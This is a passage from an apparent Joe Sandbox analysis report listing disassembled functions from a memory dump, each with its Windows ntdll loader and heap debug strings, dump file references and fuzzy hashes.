                                                              • LdrpInitShimEngine, xrefs: 359999F4, 35999A07, 35999A30
                                                              • apphelp.dll, xrefs: 35936496
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35999A01
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 35999A11, 35999A3A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-204845295
                                                              • Opcode ID: 4451990ea1169f01ca9b51d58fe1945c7f7d54deef88f13d48ba8d19fd5092ff
                                                              • Instruction ID: b3925e582d30f648f99eaa7ca6b60b0ca8b42aadab135425c89543dbe4c71a85
                                                              • Opcode Fuzzy Hash: 4451990ea1169f01ca9b51d58fe1945c7f7d54deef88f13d48ba8d19fd5092ff
                                                              • Instruction Fuzzy Hash: 0551AD7161D308DFE725CF24D841B9B77FDFB88658F40092AE585AB1A1EA30E905CB93
                                                              Function 359BFD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                              • API String ID: 3446177414-4227709934
                                                              • Opcode ID: 80fbccd7dd2762c3462fc1c9360a9c57e5b114e95bcbfc94d60aa9be3ff63d6e
                                                              • Instruction ID: 377e77c95d2b7d66212164dc52a670623db413ea50051755e3ea39e0ca4a3506
                                                              • Opcode Fuzzy Hash: 80fbccd7dd2762c3462fc1c9360a9c57e5b114e95bcbfc94d60aa9be3ff63d6e
                                                              • Instruction Fuzzy Hash: EC417FB9A04209AFEF01DFD9D880AEEBBB9FF48704F100159E905B7341D7B19911DB90
                                                              Function 359365B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35999AF6
                                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35999AB4
                                                              • LdrpLoadShimEngine, xrefs: 35999ABB, 35999AFC
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 35999AC5, 35999B06
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-3589223738
                                                              • Opcode ID: 7572d9b6fdb930865b33f2335d290452d86c358e917b176c5d6259cd7ae7ad3c
                                                              • Instruction ID: d3ac116a6d5aed70ae63116d73d91b0e64a5f96ab8a2328d25d6f4b5403719c0
                                                              • Opcode Fuzzy Hash: 7572d9b6fdb930865b33f2335d290452d86c358e917b176c5d6259cd7ae7ad3c
                                                              • Instruction Fuzzy Hash: A3510076B193589FDB08CBACCC55E9D7BBABB44348F050066E441BF296CB64AC42DB90
                                                              Function 3596DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                              • API String ID: 3446177414-3224558752
                                                              • Opcode ID: 5c8e1752ec445768572e3015779aae55e1807eed5c1c95e0858d0d4572994025
                                                              • Instruction ID: 47da593570d335431315bfd75b15512c4d1a13f1bb51f6408270e30fcf9f9378
                                                              • Opcode Fuzzy Hash: 5c8e1752ec445768572e3015779aae55e1807eed5c1c95e0858d0d4572994025
                                                              • Instruction Fuzzy Hash: 2C41357A604748DFE312CF24C885B5AB7BDFF80378F158569D8116B391CB74A985CBA0
                                                              Function 359EF157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • HEAP: , xrefs: 359EF15D
                                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 359EF263
                                                              • ---------------------------------------, xrefs: 359EF279
                                                              • Entry Heap Size , xrefs: 359EF26D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                              • API String ID: 3446177414-1102453626
                                                              • Opcode ID: 307ba48d37d22695369838393539cae5bc729e7904b613b214991665f9a0caf2
                                                              • Instruction ID: 8a1266576a59775bc6861f8fe7c66448be5ce820684be69f47533b07b44df235
                                                              • Opcode Fuzzy Hash: 307ba48d37d22695369838393539cae5bc729e7904b613b214991665f9a0caf2
                                                              • Instruction Fuzzy Hash: DD418C39A15215DFCB06CF18D88490ABBFAFF4939871680AAD408AB311DB31EC43DF90
                                                              Function 3596DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                              • API String ID: 3446177414-1222099010
                                                              • Opcode ID: 45988f6796089515d9f28ed9889b7ce1f8a9f7f3ba449138f32edb37e6c27ce5
                                                              • Instruction ID: ce86f2aa49c4eb2613aca19ddfa225a120b4f9188dcc640585ae4a703098cce7
                                                              • Opcode Fuzzy Hash: 45988f6796089515d9f28ed9889b7ce1f8a9f7f3ba449138f32edb37e6c27ce5
                                                              • Instruction Fuzzy Hash: AD31293A209798DFE323CB28C815F4977F9FF01768F0A4085E85657652CBB8E985CB61
                                                              Function 35A16940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: bcf94cb9d8507545faab7ab853ca3e97d5490e2d4bafcd5e6cfac8f26c79ea8c
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: 5C0204B5608341AFD305CF18C990E6ABBF5FF88750F508A2DBD958B250DB31EA05DB92
                                                              Function 3598B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 04b014697e0d160026e413bfa1f2910933735fd5015835281aefd005757b54db
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 4381C278E093498EEB14CE64C891BEEBBBBBF45360F5C4259D8B1A76D1CB349840CB50
                                                              Function 35949126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$@
                                                              • API String ID: 3446177414-1194432280
                                                              • Opcode ID: b4d04668581e7a45e4af5fd1504b69a04507044a1d62c4c865b651040351c634
                                                              • Instruction ID: 9363e05f723eb40e8787fb7205c8d05c73b3adf89c5f1854cb289ff96b9d6146
                                                              • Opcode Fuzzy Hash: b4d04668581e7a45e4af5fd1504b69a04507044a1d62c4c865b651040351c634
                                                              • Instruction Fuzzy Hash: B18119B6D052699BDB21CF54CD44BDEB7B8BB48750F0041EAE919B7240D770AE85CFA0
                                                              Function 35974D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • LdrpFindDllActivationContext, xrefs: 359B3636, 359B3662
                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 359B365C
                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 359B362F
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 359B3640, 359B366C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 3446177414-3779518884
                                                              • Opcode ID: e2bec66b10f6eb557cf859658f33a1cf382c5743a74dbc7dec4970637f9c3ddb
                                                              • Instruction ID: b5a1d9527ed0b42d55a0dc08994cf558ce5e5ea455b13157a89344f07d96851e
                                                              • Opcode Fuzzy Hash: e2bec66b10f6eb557cf859658f33a1cf382c5743a74dbc7dec4970637f9c3ddb
                                                              • Instruction Fuzzy Hash: 233126B6908315EEEF22DB48C848F59A2ADFF41394F464067E8CC67153DBE0BF808695
                                                              Function 3596245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpDynamicShimModule, xrefs: 359AA998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 359AA992
                                                              • apphelp.dll, xrefs: 35962462
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 359AA9A2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 1e5d48d089319a72edc3e2ea102948ee2377c9466760914b216b997cceec72b5
                                                              • Instruction ID: e9743545e7dfb8fb3baa1b771df98fcc9c5877151327bb1f79fe498f4cc14357
                                                              • Opcode Fuzzy Hash: 1e5d48d089319a72edc3e2ea102948ee2377c9466760914b216b997cceec72b5
                                                              • Instruction Fuzzy Hash: 7D312676A18341ABEB10CF5CDC41E6E7BB9FB88758F16005AEC017B240CB74A843DBA0
                                                              Function 359F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: c7c9f8bdc37f674e6dbe41394107cdf57f4a31121ee2598f8db83f32fe9dc907
                                                              • Instruction ID: c2ed18673f71504149cd742054bb7e8db077f7d9a15e63b185cab1bae8998f36
                                                              • Opcode Fuzzy Hash: c7c9f8bdc37f674e6dbe41394107cdf57f4a31121ee2598f8db83f32fe9dc907
                                                              • Instruction Fuzzy Hash: C32181BAB00219ABDB00DF69CD40AEE7BFDAF48284F440116E915E7201EB31E9018BA1
                                                              Function 3593F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 3446177414-3610490719
                                                              • Opcode ID: 93b0596f323e76eb5679e4f8c50d8d7ca045cde053773dfb3a058aa4dd844328
                                                              • Instruction ID: 77371c6fbe57c30856df9eeb49ab59377f2ae14fd292ac03e025d8cc8f331a80
                                                              • Opcode Fuzzy Hash: 93b0596f323e76eb5679e4f8c50d8d7ca045cde053773dfb3a058aa4dd844328
                                                              • Instruction Fuzzy Hash: 9E910375706741DFE716CF24C886FAAB7BABF84744F000459E9459B282EB78F841CB92
                                                              Function 35960BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Failed to allocated memory for shimmed module list, xrefs: 359AA10F
                                                              • LdrpCheckModule, xrefs: 359AA117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 359AA121
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-161242083
                                                              • Opcode ID: 830df14577779cee01328f3b3e8d622c53be15fe552c76efc3166a0a7a6b00a6
                                                              • Instruction ID: 60203b0ae227cf959a40f83d93767e2c32c2c8492ee77e2e7a9b4fab503f064d
                                                              • Opcode Fuzzy Hash: 830df14577779cee01328f3b3e8d622c53be15fe552c76efc3166a0a7a6b00a6
                                                              • Instruction Fuzzy Hash: 2671DF75A04305DFEB14DF68CD91AAEB7F9FB48318F154469D802EB211EB38AD46CB60
                                                              Function 35A18927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $File
                                                              • API String ID: 3446177414-2412145507
                                                              • Opcode ID: 853be8fc39aeeee2cb498902cb02b3dc4d989ae670630bc63bd8b854f89ce358
                                                              • Instruction ID: cb045542d04edb9e335cd10954c438d3dea59b9b4632a46cecd850495308941b
                                                              • Opcode Fuzzy Hash: 853be8fc39aeeee2cb498902cb02b3dc4d989ae670630bc63bd8b854f89ce358
                                                              • Instruction Fuzzy Hash: E661DD72A1422DABDB26CF64DC41FEDB7BDAB08700F4441E9A919E6181DB70AF80DF50
                                                              Function 35969803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 3446177414-2283098728
                                                              • Opcode ID: 304b38a131ad47a36fac6bf3a1cfd8987b698562aa46774eb90a31731ac62720
                                                              • Instruction ID: 87d3f0a8ef6e70da46de8a9f62b451db462efc6489ae12269e890c9b2060cb10
                                                              • Opcode Fuzzy Hash: 304b38a131ad47a36fac6bf3a1cfd8987b698562aa46774eb90a31731ac62720
                                                              • Instruction Fuzzy Hash: 0C51F4717087019FE714DF28C881F19F7BDBB8427CF040A6DE8969B291DB74A809DB91
                                                              Function 3597C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 359B82DE
                                                              • Failed to reallocate the system dirs string !, xrefs: 359B82D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 359B82E8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-1783798831
                                                              • Opcode ID: af3178a3c5b1c1550f27b5dbfadbeddce5f985dc2ed1d32bb81c45f62694538c
                                                              • Instruction ID: d10436c2e7fdda4f9bc463f13843393dfa01533de1cf75a815cb9cadf7290d87
                                                              • Opcode Fuzzy Hash: af3178a3c5b1c1550f27b5dbfadbeddce5f985dc2ed1d32bb81c45f62694538c
                                                              • Instruction Fuzzy Hash: 6B41EFB5618304EBDB10DB68DC40B4B77F8BF486A4F05096AF948E7251EF70E8029B91
                                                              Function 3597BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 359B7B8E
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 359B7B7F
                                                              • RTL: Re-Waiting, xrefs: 359B7BAC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: b4e27991281694ebbf5c01a9ca0ff4dd018717e57b1b02dccf787c0156ace925
                                                              • Instruction ID: e9676c11d78a97be6d1162ac20238efc5d622a5553ba2e2fdbc0bf6bb30a3083
                                                              • Opcode Fuzzy Hash: b4e27991281694ebbf5c01a9ca0ff4dd018717e57b1b02dccf787c0156ace925
                                                              • Instruction Fuzzy Hash: F541CF357047069FE710DE25CC40B5AB7EAFF88710F000A5EE95A9B281EB71E5058F91
                                                              Function 3597B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 359B728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 359B72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 359B7294
                                                              • RTL: Re-Waiting, xrefs: 359B72C1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 5cc1dde2690671dd5b1b891388a0eed85ada793a63428a44d9cf10e36f92305d
                                                              • Instruction ID: 4d5d851ae244f7be210cb09ede13f0c07840df0b6a28b47db9fb72e616d5f0f9
                                                              • Opcode Fuzzy Hash: 5cc1dde2690671dd5b1b891388a0eed85ada793a63428a44d9cf10e36f92305d
                                                              • Instruction Fuzzy Hash: 3B419A35B04206ABEB11CF25CC41F5AB7AAFF84750F10065AF955AB280EB61E856CBD1
                                                              Function 359C4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                              Download Yara Rule
